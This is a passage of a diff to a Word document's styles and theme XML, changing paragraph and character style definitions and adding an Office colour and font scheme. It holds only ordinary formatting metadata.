+    <w:lsdException w:name="Medium Shading 1 Accent 1" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 1" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 1" w:uiPriority="65"/>
+    <w:lsdException w:name="Revision" w:semiHidden="1"/>
+    <w:lsdException w:name="List Paragraph" w:uiPriority="34" w:qFormat="1"/>
+    <w:lsdException w:name="Quote" w:uiPriority="29" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Quote" w:uiPriority="30" w:qFormat="1"/>
+    <w:lsdException w:name="Medium List 2 Accent 1" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 1" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 1" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 1" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 1" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 1" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 1" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 1" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 2" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 2" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 2" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 2" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 2" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 2" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 2" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 2" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 2" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 2" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 2" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 2" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 2" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 2" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 3" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 3" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 3" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 3" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 3" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 3" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 3" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 3" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 3" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 3" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 3" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 3" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 3" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 3" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 4" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 4" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 4" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 4" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 4" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 4" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 4" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 4" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 4" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 4" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 4" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 4" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 4" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 4" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 5" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 5" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 5" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 5" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 5" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 5" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 5" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 5" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 5" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 5" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 5" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 5" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 5" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 5" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 6" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 6" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 6" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 6" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 6" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 6" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 6" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 6" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 6" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 6" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 6" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 6" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 6" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 6" w:uiPriority="73"/>
+    <w:lsdException w:name="Subtle Emphasis" w:uiPriority="19" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Emphasis" w:uiPriority="21" w:qFormat="1"/>
+    <w:lsdException w:name="Subtle Reference" w:uiPriority="31" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Reference" w:uiPriority="32" w:qFormat="1"/>
+    <w:lsdException w:name="Book Title" w:uiPriority="33" w:qFormat="1"/>
+    <w:lsdException w:name="Bibliography" w:semiHidden="1" w:uiPriority="37" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="TOC Heading" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="Plain Table 1" w:uiPriority="41"/>
+    <w:lsdException w:name="Plain Table 2" w:uiPriority="42"/>
+    <w:lsdException w:name="Plain Table 3" w:uiPriority="43"/>
+    <w:lsdException w:name="Plain Table 4" w:uiPriority="44"/>
+    <w:lsdException w:name="Plain Table 5" w:uiPriority="45"/>
+    <w:lsdException w:name="Grid Table Light" w:uiPriority="40"/>
+    <w:lsdException w:name="Grid Table 1 Light" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 1" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 1" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 1" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 1" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 1" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 1" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 1" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 2" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 2" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 2" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 2" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 2" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 2" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 2" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 3" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 3" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 3" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 3" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 3" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 3" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 3" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 4" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 4" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 4" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 4" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 4" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 4" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 4" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 5" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 5" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 5" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 5" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 5" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 5" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 5" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 6" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 6" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 6" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 6" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 6" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 6" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 6" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 1" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 1" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 1" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 1" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 1" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 1" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 1" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 2" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 2" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 2" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 2" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 2" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 2" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 2" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 3" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 3" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 3" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 3" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 3" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 3" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 3" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 4" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 4" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 4" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 4" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 4" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 4" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 4" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 5" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 5" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 5" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 5" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 5" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 5" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 5" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 6" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 6" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 6" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 6" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 6" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 6" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 6" w:uiPriority="52"/>
+    <w:lsdException w:name="Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Smart Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Hashtag" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Unresolved Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Smart Link" w:semiHidden="1" w:unhideWhenUsed="1"/>
+  </w:latentStyles>
+  <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
     <w:qFormat/>
-    <w:pPr>
-      <w:widowControl/>
-      <w:suppressAutoHyphens w:val="true"/>
-      <w:bidi w:val="0"/>
-      <w:spacing w:before="0" w:after="0"/>
-      <w:jc w:val="left"/>
-    </w:pPr>
-    <w:rPr>
-      <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="Noto Serif CJK SC" w:cs="FreeSans"/>
-      <w:color w:val="auto"/>
-      <w:kern w:val="2"/>
-      <w:sz w:val="24"/>
-      <w:szCs w:val="24"/>
-      <w:lang w:val="en-AU" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-    </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="SourceText">
+  <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
+    <w:name w:val="Default Paragraph Font"/>
+    <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+  </w:style>
+  <w:style w:type="table" w:default="1" w:styleId="TableNormal">
+    <w:name w:val="Normal Table"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:tblPr>
+      <w:tblInd w:w="0" w:type="dxa"/>
+      <w:tblCellMar>
+        <w:top w:w="0" w:type="dxa"/>
+        <w:left w:w="108" w:type="dxa"/>
+        <w:bottom w:w="0" w:type="dxa"/>
+        <w:right w:w="108" w:type="dxa"/>
+      </w:tblCellMar>
+    </w:tblPr>
+  </w:style>
+  <w:style w:type="numbering" w:default="1" w:styleId="NoList">
+    <w:name w:val="No List"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="SourceText">
     <w:name w:val="Source Text"/>
     <w:qFormat/>
     <w:rPr>
-      <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Noto Sans Mono CJK SC" w:cs="Liberation Mono"/>
+      <w:rFonts w:ascii="Liberation Mono" w:eastAsia="Noto Sans Mono CJK SC" w:hAnsi="Liberation Mono" w:cs="Liberation Mono"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="InternetLink">
+  <w:style w:type="character" w:styleId="Hyperlink">
     <w:name w:val="Hyperlink"/>
     <w:rPr>
       <w:color w:val="000080"/>
       <w:u w:val="single"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Heading">
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Heading">
     <w:name w:val="Heading"/>
     <w:basedOn w:val="Normal"/>
-    <w:next w:val="TextBody"/>
+    <w:next w:val="BodyText"/>
     <w:qFormat/>
     <w:pPr>
-      <w:keepNext w:val="true"/>
+      <w:keepNext/>
       <w:spacing w:before="240" w:after="120"/>
     </w:pPr>
     <w:rPr>
-      <w:rFonts w:ascii="Liberation Sans" w:hAnsi="Liberation Sans" w:eastAsia="Noto Sans CJK SC" w:cs="FreeSans"/>
+      <w:rFonts w:ascii="Liberation Sans" w:eastAsia="Noto Sans CJK SC" w:hAnsi="Liberation Sans"/>
       <w:sz w:val="28"/>
       <w:szCs w:val="28"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="TextBody">
+  <w:style w:type="paragraph" w:styleId="BodyText">
     <w:name w:val="Body Text"/>
     <w:basedOn w:val="Normal"/>
     <w:pPr>
-      <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+      <w:spacing w:after="140" w:line="276" w:lineRule="auto"/>
     </w:pPr>
-    <w:rPr/>
   </w:style>
   <w:style w:type="paragraph" w:styleId="List">
     <w:name w:val="List"/>
-    <w:basedOn w:val="TextBody"/>
-    <w:pPr/>
-    <w:rPr>
-      <w:rFonts w:cs="FreeSans"/>
-    </w:rPr>
+    <w:basedOn w:val="BodyText"/>
   </w:style>
   <w:style w:type="paragraph" w:styleId="Caption">
-    <w:name w:val="Caption"/>
+    <w:name w:val="caption"/>
     <w:basedOn w:val="Normal"/>
     <w:qFormat/>
     <w:pPr>
@@ -4195,53 +4426,42 @@
       <w:spacing w:before="120" w:after="120"/>
     </w:pPr>
     <w:rPr>
-      <w:rFonts w:cs="FreeSans"/>
       <w:i/>
       <w:iCs/>
-      <w:sz w:val="24"/>
-      <w:szCs w:val="24"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Index">
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Index">
     <w:name w:val="Index"/>
     <w:basedOn w:val="Normal"/>
     <w:qFormat/>
     <w:pPr>
       <w:suppressLineNumbers/>
     </w:pPr>
-    <w:rPr>
-      <w:rFonts w:cs="FreeSans"/>
-    </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="PreformattedText">
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="PreformattedText">
     <w:name w:val="Preformatted Text"/>
     <w:basedOn w:val="Normal"/>
     <w:qFormat/>
-    <w:pPr>
-      <w:spacing w:before="0" w:after="0"/>
-    </w:pPr>
     <w:rPr>
-      <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Noto Sans Mono CJK SC" w:cs="Liberation Mono"/>
+      <w:rFonts w:ascii="Liberation Mono" w:eastAsia="Noto Sans Mono CJK SC" w:hAnsi="Liberation Mono" w:cs="Liberation Mono"/>
       <w:sz w:val="20"/>
       <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="TableContents">
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableContents">
     <w:name w:val="Table Contents"/>
     <w:basedOn w:val="Normal"/>
     <w:qFormat/>
     <w:pPr>
-      <w:widowControl w:val="false"/>
+      <w:widowControl w:val="0"/>
       <w:suppressLineNumbers/>
     </w:pPr>
-    <w:rPr/>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="TableHeading">
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableHeading">
     <w:name w:val="Table Heading"/>
     <w:basedOn w:val="TableContents"/>
     <w:qFormat/>
     <w:pPr>
-      <w:suppressLineNumbers/>
       <w:jc w:val="center"/>
     </w:pPr>
     <w:rPr>
@@ -4249,5 +4469,366 @@
       <w:bCs/>
     </w:rPr>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="Header">
+    <w:name w:val="header"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="HeaderChar"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00106700"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4513"/>
+        <w:tab w:val="right" w:pos="9026"/>
+      </w:tabs>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:cs="Mangal"/>
+      <w:szCs w:val="21"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
+    <w:name w:val="Header Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Header"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="00106700"/>
+    <w:rPr>
+      <w:rFonts w:cs="Mangal"/>
+      <w:szCs w:val="21"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Footer">
+    <w:name w:val="footer"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="FooterChar"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00106700"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4513"/>
+        <w:tab w:val="right" w:pos="9026"/>
+      </w:tabs>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:cs="Mangal"/>
+      <w:szCs w:val="21"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
+    <w:name w:val="Footer Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Footer"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="00106700"/>
+    <w:rPr>
+      <w:rFonts w:cs="Mangal"/>
+      <w:szCs w:val="21"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="PageNumber">
+    <w:name w:val="page number"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00106700"/>
+  </w:style>
 </w:styles>
+</file>
+
+<file path=word/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
+<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme">
+  <a:themeElements>
+    <a:clrScheme name="Office">
+      <a:dk1>
+        <a:sysClr val="windowText" lastClr="000000"/>
+      </a:dk1>
+      <a:lt1>
+        <a:sysClr val="window" lastClr="FFFFFF"/>
+      </a:lt1>
+      <a:dk2>
+        <a:srgbClr val="44546A"/>
+      </a:dk2>
+      <a:lt2>
+        <a:srgbClr val="E7E6E6"/>
+      </a:lt2>
+      <a:accent1>
+        <a:srgbClr val="4472C4"/>
+      </a:accent1>
+      <a:accent2>
+        <a:srgbClr val="ED7D31"/>
+      </a:accent2>
+      <a:accent3>
+        <a:srgbClr val="A5A5A5"/>
+      </a:accent3>
+      <a:accent4>
+        <a:srgbClr val="FFC000"/>
+      </a:accent4>
+      <a:accent5>
+        <a:srgbClr val="5B9BD5"/>
+      </a:accent5>
+      <a:accent6>
+        <a:srgbClr val="70AD47"/>
+      </a:accent6>
+      <a:hlink>
+        <a:srgbClr val="0563C1"/>
+      </a:hlink>
+      <a:folHlink>
+        <a:srgbClr val="954F72"/>
+      </a:folHlink>
+    </a:clrScheme>
+    <a:fontScheme name="Office">
+      <a:majorFont>
+        <a:latin typeface="Calibri Light" panose="020F0302020204030204"/>
+        <a:ea typeface=""/>
+        <a:cs typeface=""/>
+        <a:font script="Jpan" typeface="游ゴシック Light"/>
+        <a:font script="Hang" typeface="맑은 고딕"/>
+        <a:font script="Hans" typeface="等线 Light"/>
+        <a:font script="Hant" typeface="新細明體"/>
+        <a:font script="Arab" typeface="Times New Roman"/>
+        <a:font script="Hebr" typeface="Times New Roman"/>
+        <a:font script="Thai" typeface="Angsana New"/>
+        <a:font script="Ethi" typeface="Nyala"/>
+        <a:font script="Beng" typeface="Vrinda"/>
+        <a:font script="Gujr" typeface="Shruti"/>
+        <a:font script="Khmr" typeface="MoolBoran"/>
+        <a:font script="Knda" typeface="Tunga"/>
+        <a:font script="Guru" typeface="Raavi"/>
+        <a:font script="Cans" typeface="Euphemia"/>
+        <a:font script="Cher" typeface="Plantagenet Cherokee"/>
+        <a:font script="Yiii" typeface="Microsoft Yi Baiti"/>
+        <a:font script="Tibt" typeface="Microsoft Himalaya"/>
+        <a:font script="Thaa" typeface="MV Boli"/>
+        <a:font script="Deva" typeface="Mangal"/>
+        <a:font script="Telu" typeface="Gautami"/>
+        <a:font script="Taml" typeface="Latha"/>
+        <a:font script="Syrc" typeface="Estrangelo Edessa"/>
+        <a:font script="Orya" typeface="Kalinga"/>
+        <a:font script="Mlym" typeface="Kartika"/>
+        <a:font script="Laoo" typeface="DokChampa"/>
+        <a:font script="Sinh" typeface="Iskoola Pota"/>
+        <a:font script="Mong" typeface="Mongolian Baiti"/>
+        <a:font script="Viet" typeface="Times New Roman"/>
+        <a:font script="Uigh" typeface="Microsoft Uighur"/>
+        <a:font script="Geor" typeface="Sylfaen"/>
+        <a:font script="Armn" typeface="Arial"/>
+        <a:font script="Bugi" typeface="Leelawadee UI"/>
+        <a:font script="Bopo" typeface="Microsoft JhengHei"/>
+        <a:font script="Java" typeface="Javanese Text"/>
+        <a:font script="Lisu" typeface="Segoe UI"/>
+        <a:font script="Mymr" typeface="Myanmar Text"/>
+        <a:font script="Nkoo" typeface="Ebrima"/>
+        <a:font script="Olck" typeface="Nirmala UI"/>
+        <a:font script="Osma" typeface="Ebrima"/>
+        <a:font script="Phag" typeface="Phagspa"/>
+        <a:font script="Syrn" typeface="Estrangelo Edessa"/>
+        <a:font script="Syrj" typeface="Estrangelo Edessa"/>
+        <a:font script="Syre" typeface="Estrangelo Edessa"/>
+        <a:font script="Sora" typeface="Nirmala UI"/>
+        <a:font script="Tale" typeface="Microsoft Tai Le"/>
+        <a:font script="Talu" typeface="Microsoft New Tai Lue"/>
+        <a:font script="Tfng" typeface="Ebrima"/>
+      </a:majorFont>
+      <a:minorFont>
+        <a:latin typeface="Calibri" panose="020F0502020204030204"/>
+        <a:ea typeface=""/>
+        <a:cs typeface=""/>
+        <a:font script="Jpan" typeface="游明朝"/>
+        <a:font script="Hang" typeface="맑은 고딕"/>
+        <a:font script="Hans" typeface="等线"/>
+        <a:font script="Hant" typeface="新細明體"/>
+        <a:font script="Arab" typeface="Arial"/>
+        <a:font script="Hebr" typeface="Arial"/>
+        <a:font script="Thai" typeface="Cordia New"/>
+        <a:font script="Ethi" typeface="Nyala"/>
+        <a:font script="Beng" typeface="Vrinda"/>
+        <a:font script="Gujr" typeface="Shruti"/>
+        <a:font script="Khmr" typeface="DaunPenh"/>
+        <a:font script="Knda" typeface="Tunga"/>
+        <a:font script="Guru" typeface="Raavi"/>
+        <a:font script="Cans" typeface="Euphemia"/>
+        <a:font script="Cher" typeface="Plantagenet Cherokee"/>
+        <a:font script="Yiii" typeface="Microsoft Yi Baiti"/>
+        <a:font script="Tibt" typeface="Microsoft Himalaya"/>
+        <a:font script="Thaa" typeface="MV Boli"/>
+        <a:font script="Deva" typeface="Mangal"/>
+        <a:font script="Telu" typeface="Gautami"/>
+        <a:font script="Taml" typeface="Latha"/>
